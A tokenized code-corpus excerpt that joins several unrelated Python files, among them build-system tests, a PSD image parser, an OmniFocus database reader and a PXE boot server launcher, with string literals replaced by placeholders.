topdir , name , repo_id ) <EOL> def prepare ( ) : <EOL> if MOCK : <EOL> mock_docker ( ) <EOL> tasker = DockerTasker ( ) <EOL> workflow = DockerBuildWorkflow ( SOURCE , "<STR_LIT>" ) <EOL> setattr ( workflow , '<STR_LIT>' , X ( ) ) <EOL> setattr ( workflow . builder , '<STR_LIT>' , "<STR_LIT>" ) <EOL> setattr ( workflow . builder , '<STR_LIT>' , ImageName ( repo = '<STR_LIT>' , tag = '<STR_LIT>' ) ) <EOL> setattr ( workflow . builder , '<STR_LIT:source>' , X ( ) ) <EOL> setattr ( workflow . builder . source , '<STR_LIT>' , None ) <EOL> setattr ( workflow . builder . source , '<STR_LIT:path>' , None ) <EOL> flexmock ( koji , <EOL> ClientSession = MockedClientSession , <EOL> PathInfo = MockedPathInfo ) <EOL> return tasker , workflow <EOL> class TestKoji ( object ) : <EOL> @ pytest . mark . parametrize ( ( '<STR_LIT:root>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , [ <EOL> ( '<STR_LIT>' , <EOL> False , <EOL> None , <EOL> None , <EOL> None ) , <EOL> ( '<STR_LIT>' , <EOL> False , <EOL> None , <EOL> None , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> False , <EOL> '<STR_LIT>' , <EOL> None , <EOL> None ) , <EOL> ( '<STR_LIT>' , <EOL> False , <EOL> '<STR_LIT>' , <EOL> None , <EOL> '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_koji_plugin ( self , tmpdir , root , koji_ssl_certs , <EOL> expected_string , expected_file , proxy ) : <EOL> tasker , workflow = prepare ( ) <EOL> args = { <EOL> '<STR_LIT:target>' : KOJI_TARGET , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:root>' : root , <EOL> '<STR_LIT>' : proxy <EOL> } <EOL> if koji_ssl_certs : <EOL> args [ '<STR_LIT>' ] = str ( tmpdir ) <EOL> with open ( '<STR_LIT>' . format ( tmpdir ) , '<STR_LIT:w>' ) as ca_fd : <EOL> ca_fd . write ( '<STR_LIT>' ) <EOL> runner = PreBuildPluginsRunner ( tasker , workflow , [ { <EOL> '<STR_LIT:name>' : KojiPlugin . key , <EOL> '<STR_LIT:args>' : args , <EOL> } ] ) <EOL> runner . run ( ) <EOL> repofile = '<STR_LIT>' <EOL> assert repofile in workflow . 
files <EOL> content = workflow . files [ repofile ] <EOL> assert content . startswith ( "<STR_LIT>" ) <EOL> assert "<STR_LIT>" in content <EOL> assert "<STR_LIT>" in content <EOL> assert "<STR_LIT>" in content <EOL> assert "<STR_LIT>" % root in content <EOL> if proxy : <EOL> assert "<STR_LIT>" % proxy in content <EOL> if expected_string : <EOL> assert expected_string in content <EOL> if expected_file : <EOL> assert expected_file in workflow . files </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , absolute_import , unicode_literals <EOL> import logging <EOL> from osbs . utils import graceful_chain_get <EOL> logger = logging . getLogger ( __name__ ) <EOL> class PodResponse ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pod ) : <EOL> """<STR_LIT>""" <EOL> self . _json = pod <EOL> @ property <EOL> def json ( self ) : <EOL> return self . _json <EOL> def get_container_image_ids ( self ) : <EOL> """<STR_LIT>""" <EOL> statuses = graceful_chain_get ( self . json , "<STR_LIT:status>" , "<STR_LIT>" ) <EOL> if statuses is None : <EOL> return { } <EOL> def remove_prefix ( image_id , prefix ) : <EOL> if image_id . startswith ( prefix ) : <EOL> return image_id [ len ( prefix ) : ] <EOL> return image_id <EOL> return dict ( [ ( status [ '<STR_LIT:image>' ] , remove_prefix ( status [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) ) <EOL> for status in statuses ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , unicode_literals <EOL> import pytest <EOL> import logging <EOL> from osbs . conf import Configuration <EOL> from osbs . api import OSBS <EOL> from osbs . exceptions import OsbsException <EOL> from tempfile import NamedTemporaryFile <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> def test_missing_config ( ) : <EOL> os_conf = Configuration ( conf_file = "<STR_LIT>" , <EOL> conf_section = "<STR_LIT:default>" ) <EOL> def test_no_config ( ) : <EOL> os_conf = Configuration ( conf_file = None , <EOL> openshift_uri = '<STR_LIT>' ) <EOL> assert os_conf . get_openshift_oauth_api_uri ( ) == '<STR_LIT>' <EOL> def test_missing_section ( ) : <EOL> with NamedTemporaryFile ( ) as f : <EOL> os_conf = Configuration ( conf_file = f . name , <EOL> conf_section = "<STR_LIT>" ) <EOL> def test_no_build_type ( ) : <EOL> with NamedTemporaryFile ( mode = '<STR_LIT>' ) as f : <EOL> f . write ( """<STR_LIT>""" ) <EOL> f . flush ( ) <EOL> f . seek ( <NUM_LIT:0> ) <EOL> os_conf = Configuration ( conf_file = f . name , <EOL> conf_section = "<STR_LIT:default>" ) <EOL> assert os_conf . get_build_type ( ) is None <EOL> def test_no_inputs ( ) : <EOL> with NamedTemporaryFile ( mode = '<STR_LIT>' ) as f : <EOL> f . write ( """<STR_LIT>""" ) <EOL> f . flush ( ) <EOL> f . seek ( <NUM_LIT:0> ) <EOL> with pytest . raises ( OsbsException ) : <EOL> os_conf = Configuration ( conf_file = f . name , <EOL> conf_section = "<STR_LIT:default>" ) <EOL> build_conf = Configuration ( conf_file = f . name , <EOL> conf_section = "<STR_LIT:default>" ) <EOL> osbs = OSBS ( os_conf , build_conf ) <EOL> osbs . create_build ( git_uri = "<STR_LIT>" , <EOL> git_ref = "<STR_LIT>" , <EOL> user = "<STR_LIT:user>" , <EOL> component = "<STR_LIT>" , <EOL> target = "<STR_LIT:target>" , <EOL> architecture = "<STR_LIT>" ) </s>
<s> '''<STR_LIT>''' <EOL> import datetime as dt <EOL> import random <EOL> __title__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> class Model ( object ) : <EOL> '''<STR_LIT>''' <EOL> seed = None <EOL> schedule = None <EOL> running = True <EOL> def __init__ ( self , seed = None ) : <EOL> '''<STR_LIT>''' <EOL> if seed is None : <EOL> self . seed = dt . datetime . now ( ) <EOL> else : <EOL> self . seed = seed <EOL> random . seed ( seed ) <EOL> self . running = True <EOL> def run_model ( self ) : <EOL> '''<STR_LIT>''' <EOL> while self . running : <EOL> self . step ( ) <EOL> def step ( self ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> class Agent ( object ) : <EOL> '''<STR_LIT>''' <EOL> model = None <EOL> unique_id = None <EOL> def __init__ ( self , unique_id , model ) : <EOL> '''<STR_LIT>''' <EOL> self . model = model <EOL> def step ( self , model ) : <EOL> '''<STR_LIT>''' <EOL> pass </s>
<s> import unittest <EOL> from app import db , app <EOL> class ApiTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> app . config [ '<STR_LIT>' ] = True <EOL> app . config [ '<STR_LIT>' ] = True <EOL> self . app = app . test_client ( ) <EOL> db . create_all ( ) <EOL> def tearDown ( self ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) </s>
<s> from . _exposition import MetricsResource <EOL> __all__ = [ '<STR_LIT>' ] </s>
<s> from __future__ import absolute_import , unicode_literals , print_function <EOL> import logging <EOL> import docopt <EOL> import psd_tools . reader <EOL> import psd_tools . decoder <EOL> from psd_tools import PSDImage <EOL> from psd_tools . user_api . layers import group_layers <EOL> from psd_tools . debug import pprint <EOL> from psd_tools . version import __version__ <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> logger . addHandler ( logging . StreamHandler ( ) ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> args = docopt . docopt ( main . __doc__ , version = __version__ ) <EOL> if args [ '<STR_LIT>' ] : <EOL> logger . setLevel ( logging . DEBUG ) <EOL> else : <EOL> logger . setLevel ( logging . INFO ) <EOL> encoding = args [ '<STR_LIT>' ] <EOL> if args [ '<STR_LIT>' ] : <EOL> psd = PSDImage . load ( args [ '<STR_LIT>' ] , encoding = encoding ) <EOL> im = psd . as_PIL ( ) <EOL> im . save ( args [ '<STR_LIT>' ] ) <EOL> elif args [ '<STR_LIT>' ] : <EOL> psd = PSDImage . load ( args [ '<STR_LIT>' ] , encoding = encoding ) <EOL> index = int ( args [ '<STR_LIT>' ] ) <EOL> im = psd . layers [ index ] . as_PIL ( ) <EOL> im . save ( args [ '<STR_LIT>' ] ) <EOL> print ( psd . layers ) <EOL> psd . as_PIL ( ) <EOL> elif args [ '<STR_LIT>' ] : <EOL> with open ( args [ '<STR_LIT>' ] , "<STR_LIT:rb>" ) as f : <EOL> decoded = psd_tools . decoder . parse ( <EOL> psd_tools . reader . parse ( f , encoding ) <EOL> ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( decoded . header ) <EOL> print ( "<STR_LIT>" ) <EOL> pprint ( decoded ) <EOL> print ( "<STR_LIT>" ) <EOL> pprint ( group_layers ( decoded ) ) </s>
<s> from __future__ import absolute_import , division , unicode_literals , print_function <EOL> import sys <EOL> import struct <EOL> import array <EOL> try : <EOL> unichr = unichr <EOL> except NameError : <EOL> unichr = chr <EOL> def unpack ( fmt , data ) : <EOL> fmt = str ( "<STR_LIT:>>" + fmt ) <EOL> return struct . unpack ( fmt , data ) <EOL> def read_fmt ( fmt , fp ) : <EOL> """<STR_LIT>""" <EOL> fmt = str ( "<STR_LIT:>>" + fmt ) <EOL> fmt_size = struct . calcsize ( fmt ) <EOL> data = fp . read ( fmt_size ) <EOL> assert len ( data ) == fmt_size , ( len ( data ) , fmt_size ) <EOL> return struct . unpack ( fmt , data ) <EOL> def pad ( number , divisor ) : <EOL> if number % divisor : <EOL> number = ( number // divisor + <NUM_LIT:1> ) * divisor <EOL> return number <EOL> def read_pascal_string ( fp , encoding , padding = <NUM_LIT:1> ) : <EOL> length = read_fmt ( "<STR_LIT:B>" , fp ) [ <NUM_LIT:0> ] <EOL> if length == <NUM_LIT:0> : <EOL> fp . seek ( padding - <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> return '<STR_LIT>' <EOL> res = fp . read ( length ) <EOL> padded_length = pad ( length + <NUM_LIT:1> , padding ) - <NUM_LIT:1> <EOL> fp . seek ( padded_length - length , <NUM_LIT:1> ) <EOL> return res . decode ( encoding , '<STR_LIT:replace>' ) <EOL> def read_unicode_string ( fp ) : <EOL> num_chars = read_fmt ( "<STR_LIT:I>" , fp ) [ <NUM_LIT:0> ] <EOL> data = fp . read ( num_chars * <NUM_LIT:2> ) <EOL> chars = be_array_from_bytes ( "<STR_LIT:H>" , data ) <EOL> return "<STR_LIT>" . join ( unichr ( num ) for num in chars ) <EOL> def read_be_array ( fmt , count , fp ) : <EOL> """<STR_LIT>""" <EOL> arr = array . array ( str ( fmt ) ) <EOL> arr . fromstring ( fp . read ( count * arr . itemsize ) ) <EOL> return fix_byteorder ( arr ) <EOL> def fix_byteorder ( arr ) : <EOL> """<STR_LIT>""" <EOL> if sys . byteorder == '<STR_LIT>' : <EOL> arr . byteswap ( ) <EOL> return arr <EOL> def be_array_from_bytes ( fmt , data ) : <EOL> """<STR_LIT>""" <EOL> arr = array . 
array ( str ( fmt ) , data ) <EOL> return fix_byteorder ( arr ) <EOL> def trimmed_repr ( data , trim_length = <NUM_LIT:30> ) : <EOL> if isinstance ( data , bytes ) : <EOL> if len ( data ) > trim_length : <EOL> return repr ( data [ : trim_length ] + b'<STR_LIT>' + str ( len ( data ) ) . encode ( '<STR_LIT:ascii>' ) ) <EOL> return repr ( data ) <EOL> def synchronize ( fp , limit = <NUM_LIT:8> ) : <EOL> signature_list = ( b'<STR_LIT>' , b'<STR_LIT>' ) <EOL> start = fp . tell ( ) <EOL> data = fp . read ( limit ) <EOL> for signature in signature_list : <EOL> pos = data . find ( signature ) <EOL> if pos != - <NUM_LIT:1> : <EOL> fp . seek ( start + pos ) <EOL> return True <EOL> fp . seek ( start ) <EOL> return False <EOL> def decode_fixed_point_32bit ( data ) : <EOL> """<STR_LIT>""" <EOL> lo , hi = unpack ( "<STR_LIT>" , data ) <EOL> return lo + hi / ( <NUM_LIT:2> ** <NUM_LIT:16> - <NUM_LIT:1> ) </s>
<s> '''<STR_LIT>''' <EOL> from treemodel import PROJECT , Project , Node , Task , Context , Folder , Note , sort <EOL> import sqlite3 <EOL> from os import environ , path <EOL> from datetime import datetime <EOL> from typeof import TypeOf <EOL> from xml . dom . minidom import parseString <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> '''<STR_LIT>''' <EOL> THIRTY_ONE_YEARS = <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> + <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:8> <EOL> class OFNote ( Note ) : <EOL> def __init__ ( self , item , noteXMLData ) : <EOL> self . noteXMLData = noteXMLData <EOL> self . item = item <EOL> self . text = None <EOL> self . lines = None <EOL> def get_note_lines ( self ) : <EOL> if self . lines == None : <EOL> logger . debug ( '<STR_LIT>' , self . item . id ) <EOL> dom = parseString ( self . noteXMLData ) <EOL> logger . debug ( '<STR_LIT>' , self . item . id ) <EOL> self . lines = [ ] <EOL> for para in dom . getElementsByTagName ( "<STR_LIT:p>" ) : <EOL> line = [ ] <EOL> for lit in para . getElementsByTagName ( "<STR_LIT>" ) : <EOL> if lit . firstChild != None : <EOL> nodeValue = lit . firstChild . nodeValue <EOL> if nodeValue != None : <EOL> text = self . fix_dodgy_chars ( nodeValue ) <EOL> line . append ( text ) <EOL> self . lines . append ( u'<STR_LIT>' . join ( line ) ) <EOL> logger . debug ( '<STR_LIT>' , self . item . id ) <EOL> return self . lines <EOL> def get_note ( self ) : <EOL> if self . text == None : <EOL> self . text = '<STR_LIT:\n>' . join ( self . get_note_lines ( ) ) <EOL> return self . text <EOL> def fix_dodgy_chars ( self , text ) : <EOL> try : <EOL> return unicode ( text ) <EOL> except : <EOL> buf = [ ] <EOL> for c in text : <EOL> try : <EOL> buf . append ( unicode ( c ) ) <EOL> except : <EOL> buf . append ( '<STR_LIT:?>' ) <EOL> return u'<STR_LIT>' . 
join ( buf ) <EOL> def datetimeFromAttrib ( ofattribs , name ) : <EOL> val = ofattribs [ name ] <EOL> if val == None : <EOL> return None <EOL> return datetime . fromtimestamp ( THIRTY_ONE_YEARS + val ) <EOL> def intFromAttrib ( ofattribs , name ) : <EOL> val = ofattribs [ name ] <EOL> if val == None : <EOL> return None <EOL> return val <EOL> class OFContext ( Context ) : <EOL> TABLE = '<STR_LIT>' <EOL> COLUMNS = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ofattribs = TypeOf ( '<STR_LIT>' , dict ) <EOL> def __init__ ( self , ofattribs ) : <EOL> Context . __init__ ( self , <EOL> name = ofattribs [ '<STR_LIT:name>' ] ) <EOL> self . ofattribs = ofattribs <EOL> self . order = ofattribs [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in ofattribs : <EOL> self . id = ofattribs [ '<STR_LIT>' ] <EOL> self . link = '<STR_LIT>' + ofattribs [ '<STR_LIT>' ] <EOL> self . status = u'<STR_LIT>' if '<STR_LIT>' in ofattribs and ofattribs [ '<STR_LIT>' ] == <NUM_LIT:0> else u'<STR_LIT>' <EOL> logger . debug ( '<STR_LIT>' , self . id , self . name ) <EOL> class OFTask ( Task ) : <EOL> TABLE = '<STR_LIT>' <EOL> COLUMNS = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> ofattribs = TypeOf ( '<STR_LIT>' , dict ) <EOL> def __init__ ( self , ofattribs ) : <EOL> Task . 
__init__ ( self , <EOL> name = ofattribs [ '<STR_LIT:name>' ] , <EOL> date_completed = datetimeFromAttrib ( ofattribs , '<STR_LIT>' ) , <EOL> date_to_start = datetimeFromAttrib ( ofattribs , '<STR_LIT>' ) , <EOL> date_due = datetimeFromAttrib ( ofattribs , '<STR_LIT>' ) , <EOL> date_added = datetimeFromAttrib ( ofattribs , '<STR_LIT>' ) , <EOL> estimated_minutes = intFromAttrib ( ofattribs , '<STR_LIT>' ) , <EOL> flagged = bool ( ofattribs [ '<STR_LIT>' ] ) , <EOL> context = None ) <EOL> self . ofattribs = ofattribs <EOL> self . order = ofattribs [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in ofattribs : <EOL> self . id = ofattribs [ '<STR_LIT>' ] <EOL> self . link = '<STR_LIT>' + ofattribs [ '<STR_LIT>' ] <EOL> noteXMLData = ofattribs [ '<STR_LIT>' ] <EOL> if noteXMLData != None : <EOL> self . note = OFNote ( self , noteXMLData ) <EOL> logger . debug ( '<STR_LIT>' , self . id , self . name ) <EOL> class OFFolder ( Folder ) : <EOL> TABLE = '<STR_LIT>' <EOL> COLUMNS = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ofattribs = TypeOf ( '<STR_LIT>' , dict ) <EOL> def __init__ ( self , ofattribs ) : <EOL> Folder . __init__ ( self , <EOL> name = ofattribs [ '<STR_LIT:name>' ] ) <EOL> self . ofattribs = ofattribs <EOL> self . order = ofattribs [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in ofattribs : <EOL> self . id = ofattribs [ '<STR_LIT>' ] <EOL> self . link = '<STR_LIT>' + ofattribs [ '<STR_LIT>' ] <EOL> logger . debug ( '<STR_LIT>' , self . id , self . name ) <EOL> class ProjectInfo ( Node ) : <EOL> TABLE = '<STR_LIT>' <EOL> COLUMNS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' ] <EOL> status = TypeOf ( '<STR_LIT:status>' , unicode ) <EOL> nextTask = TypeOf ( '<STR_LIT>' , str ) <EOL> def __init__ ( self , ofattribs ) : <EOL> Node . __init__ ( self , "<STR_LIT>" ) <EOL> self . ofattribs = ofattribs <EOL> self . status = ofattribs [ '<STR_LIT:status>' ] <EOL> self . 
next_task = None if ofattribs [ '<STR_LIT>' ] == None else str ( ofattribs [ '<STR_LIT>' ] ) <EOL> class OFProject ( Project ) : <EOL> ofattribs = TypeOf ( '<STR_LIT>' , dict ) <EOL> folder = TypeOf ( '<STR_LIT>' , Folder ) <EOL> project_info = TypeOf ( '<STR_LIT>' , ProjectInfo ) <EOL> def __init__ ( self ) : <EOL> pass <EOL> def query ( conn , clazz ) : <EOL> c = conn . cursor ( ) <EOL> columns = clazz . COLUMNS <EOL> results = { } <EOL> for row in c . execute ( '<STR_LIT>' + ( '<STR_LIT:U+002C>' . join ( columns ) ) + '<STR_LIT>' + clazz . TABLE ) : <EOL> rowData = { } <EOL> for i in range ( <NUM_LIT:0> , len ( columns ) ) : <EOL> key = columns [ i ] <EOL> val = row [ i ] <EOL> rowData [ key ] = val <EOL> node = clazz ( rowData ) <EOL> results [ rowData [ columns [ <NUM_LIT:0> ] ] ] = node <EOL> c . close ( ) <EOL> return results <EOL> def transmute_projects ( project_infos , tasks ) : <EOL> '''<STR_LIT>''' <EOL> logger . debug ( '<STR_LIT>' ) <EOL> projects = { } <EOL> for project in tasks . values ( ) : <EOL> if project . ofattribs [ '<STR_LIT>' ] != None : <EOL> logger . debug ( '<STR_LIT>' , project . id , project . name ) <EOL> projects [ project . ofattribs [ '<STR_LIT>' ] ] = project <EOL> project_info = project_infos [ project . ofattribs [ '<STR_LIT>' ] ] <EOL> project . __class__ = OFProject <EOL> project . __init__ ( ) <EOL> project_info . project = project <EOL> project . type = PROJECT <EOL> project . project_info = project_info <EOL> project . status = project_info . status <EOL> return projects <EOL> def wire_projects_and_folders ( projects , folders , tasks ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for project in projects . values ( ) : <EOL> project_info = project . project_info <EOL> if project . project_info != None : <EOL> folder_ref = project_info . ofattribs [ '<STR_LIT>' ] <EOL> if folder_ref != None : <EOL> logger . debug ( '<STR_LIT>' , project . id , project . name ) <EOL> folder = folders [ folder_ref ] <EOL> project . 
folder = folder <EOL> folder . add_child ( project ) <EOL> if project_info . next_task != None : <EOL> task = tasks [ project_info . next_task ] <EOL> task . next = True <EOL> def wire_task_hierarchy ( tasks ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for task in tasks . values ( ) : <EOL> if task . ofattribs [ '<STR_LIT>' ] != None : <EOL> logger . debug ( '<STR_LIT>' , task . id , task . name ) <EOL> parent = tasks [ task . ofattribs [ '<STR_LIT>' ] ] <EOL> parent . add_child ( task ) <EOL> def wire_tasks_to_enclosing_projects ( project_infos , tasks , inbox ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for task in tasks . values ( ) : <EOL> if task . ofattribs [ '<STR_LIT>' ] != None : <EOL> logger . debug ( '<STR_LIT>' , task . id , task . name ) <EOL> project_info = project_infos [ task . ofattribs [ '<STR_LIT>' ] ] <EOL> project = project_info . project <EOL> task . project = project <EOL> elif task . ofattribs [ '<STR_LIT>' ] : <EOL> inbox . add_child ( task ) <EOL> def wire_tasks_and_contexts ( contexts , tasks , no_context ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for task in tasks . values ( ) : <EOL> logger . debug ( '<STR_LIT>' , task . id , task . name ) <EOL> if task . ofattribs [ '<STR_LIT>' ] != None : <EOL> context = contexts [ task . ofattribs [ '<STR_LIT>' ] ] <EOL> task . context = context <EOL> context . children . append ( task ) <EOL> else : <EOL> task . context = no_context <EOL> no_context . children . append ( task ) <EOL> def wire_folder_hierarchy ( folders ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for folder in folders . values ( ) : <EOL> if folder . ofattribs [ '<STR_LIT>' ] != None : <EOL> logger . debug ( '<STR_LIT>' , folder . id , folder . name ) <EOL> parent = folders [ folder . ofattribs [ '<STR_LIT>' ] ] <EOL> parent . add_child ( folder ) <EOL> def wire_context_hierarchy ( contexts ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for context in contexts . values ( ) : <EOL> if context . 
ofattribs [ '<STR_LIT>' ] != None : <EOL> logger . debug ( '<STR_LIT>' , context . id , context . name ) <EOL> parent = contexts [ context . ofattribs [ '<STR_LIT>' ] ] <EOL> parent . add_child ( context ) <EOL> def only_roots ( items ) : <EOL> roots = [ ] <EOL> for item in items : <EOL> if item . parent == None : <EOL> roots . append ( item ) <EOL> return roots <EOL> def build_model ( db ) : <EOL> conn = sqlite3 . connect ( db ) <EOL> contexts = query ( conn , clazz = OFContext ) <EOL> no_context = Context ( name = '<STR_LIT>' ) <EOL> inbox = Project ( name = '<STR_LIT>' ) <EOL> project_infos = query ( conn , clazz = ProjectInfo ) <EOL> folders = query ( conn , clazz = OFFolder ) <EOL> tasks = query ( conn , clazz = OFTask ) <EOL> projects = transmute_projects ( project_infos , tasks ) <EOL> wire_projects_and_folders ( projects , folders , tasks ) <EOL> wire_task_hierarchy ( tasks ) <EOL> wire_tasks_to_enclosing_projects ( project_infos , tasks , inbox ) <EOL> wire_tasks_and_contexts ( contexts , tasks , no_context ) <EOL> wire_folder_hierarchy ( folders ) <EOL> wire_context_hierarchy ( contexts ) <EOL> conn . close ( ) <EOL> project_roots = only_roots ( projects . values ( ) ) <EOL> folder_roots = only_roots ( folders . values ( ) ) <EOL> root_projects_and_folders = project_roots + folder_roots <EOL> root_contexts = only_roots ( contexts . values ( ) ) <EOL> root_contexts . insert ( <NUM_LIT:0> , no_context ) <EOL> root_projects_and_folders . insert ( <NUM_LIT:0> , inbox ) <EOL> sort ( root_projects_and_folders ) <EOL> sort ( root_contexts ) <EOL> root_folder = Folder ( name = '<STR_LIT>' ) <EOL> for child in root_projects_and_folders : <EOL> root_folder . add_child ( child ) <EOL> root_context = Context ( name = '<STR_LIT>' , status = '<STR_LIT>' ) <EOL> for child in root_contexts : <EOL> root_context . 
add_child ( child ) <EOL> return root_folder , root_context <EOL> def find_database ( databases ) : <EOL> home = environ [ '<STR_LIT>' ] <EOL> databases = [ home + x for x in databases ] <EOL> for db in databases : <EOL> logger . debug ( "<STR_LIT>" , db ) <EOL> if ( path . exists ( db ) ) : <EOL> logger . info ( "<STR_LIT>" , db ) <EOL> return db <EOL> raise IOError ( '<STR_LIT>' + databases ) </s>
<s> import threading <EOL> import os <EOL> import sys <EOL> import json <EOL> import logging <EOL> import logging . handlers <EOL> try : <EOL> import argparse <EOL> except ImportError : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> from time import sleep <EOL> from pypxe import tftp <EOL> from pypxe import dhcp <EOL> from pypxe import http <EOL> from pypxe import nbd <EOL> args = None <EOL> SETTINGS = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> def parse_cli_arguments ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' , formatter_class = argparse . ArgumentDefaultsHelpFormatter ) <EOL> ipxeexclusive = parser . add_mutually_exclusive_group ( required = False ) <EOL> ipxeexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> ipxeexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = not SETTINGS [ '<STR_LIT>' ] ) <EOL> httpexclusive = parser . add_mutually_exclusive_group ( required = False ) <EOL> httpexclusive . 
add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> httpexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = not SETTINGS [ '<STR_LIT>' ] ) <EOL> tftpexclusive = parser . add_mutually_exclusive_group ( required = False ) <EOL> tftpexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> tftpexclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = not SETTINGS [ '<STR_LIT>' ] ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group = parser . add_argument_group ( title = '<STR_LIT>' , description = '<STR_LIT>' ) <EOL> exclusive = dhcp_group . add_mutually_exclusive_group ( required = False ) <EOL> exclusive . 
